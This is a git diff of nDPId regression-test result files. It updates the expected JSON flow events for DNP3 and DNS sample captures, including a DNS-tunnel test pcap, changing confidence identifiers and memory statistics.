00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":505,"packets-processed":504,"total-skipped-flows":0,"total-l4-payload-len":7593,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":7,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1097513177295} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":543,"packets-processed":543,"total-skipped-flows":0,"total-l4-payload-len":7788,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1097513185107} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 543/543 @@ -64,9 +64,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5895106 bytes -~~ total memory freed........: 5895106 bytes -~~ total allocations/frees...: 118702/118702 +~~ total memory allocated....: 6028740 bytes +~~ total memory freed........: 6028740 bytes +~~ total allocations/frees...: 121464/121464 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 678 chars diff --git a/test/results/dns-invalid-chars.pcap.out b/test/results/dns-invalid-chars.pcap.out index 43ed2714f..d12e62462 100644 --- a/test/results/dns-invalid-chars.pcap.out +++ b/test/results/dns-invalid-chars.pcap.out @@ -2,10 +2,10 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946734886956} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946734886956,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":946734886956,"pkt":"AAAAAAAAAAAAAAAACABFAABMyRJAAEARc4x\/AAABfwAAAYyMADUAOP5Ln2wBAAABAAAAAAAAA3d3dxdhbGx5b3VyYmEEBQZhcmViZWxvbmd0bwJjbgAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourba???arebelongto.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourba???arebelongto.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946734886957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":946734886957,"pkt":"AAAAAAAAAAAAAAAACABFAABcAABAAEARPI9\/AAABfwAAAQA1jIwASP5bn2yBgAABAAEAAAAAA3d3dxdhbGx5b3VyYmFzZXNhcmUBAgNvbmd0bwJjbgAAAQABwAwAAQABAAAAPAAEE7mN8Q=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourbasesare???ongto.cn","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"19.185.141.241"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourbasesare???ongto.cn","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"19.185.141.241"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":112,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946734886957} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 802 chars diff --git a/test/results/dns-tunnel-iodine.pcap.out b/test/results/dns-tunnel-iodine.pcap.out index 476e4bf12..4b613d8ca 100644 --- a/test/results/dns-tunnel-iodine.pcap.out +++ b/test/results/dns-tunnel-iodine.pcap.out @@ -2,11 +2,11 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1282356640051} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1282356640051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1282356640051,"pkt":"CAAnx266CAAnnOC0CABFAABEAABAAEARIngKAAIeCgACFK5fADUAMAHkErABAAABAAAAAAAAC3ZhYWFha2FyZGxpBnBpcmF0ZQNzZWEAAAoAAQ=="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":0,"num_answers":0,"reply_code":0,"query_type":10,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":0,"num_answers":0,"reply_code":0,"query_type":10,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 